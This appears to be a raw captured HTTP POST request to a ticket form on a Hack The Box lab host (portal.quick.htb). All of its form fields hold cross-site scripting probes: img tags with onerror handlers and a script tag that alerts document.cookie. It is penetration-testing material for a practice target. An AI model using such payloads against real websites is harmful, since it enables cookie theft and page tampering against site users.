POST /ticket.php HTTP/1.1
Host: portal.quick.htb:9001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://portal.quick.htb:9001/ticket.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 218
Connection: close
Cookie: PHPSESSID=m3idb8hcv59o0lep1tbqpqd35c
Upgrade-Insecure-Requests: 1

title=%3Cimg+src%3D%22x%22+onerror%3D%22document.write%28%27culprit%27%29%22+%2F%3E&msg=%3Cimg+src%3D%22x%22+onerror%3D%22document.write%28%27culprit%27%29%22+%2F%3E&id=</script><script>alert(document.cookie);</script>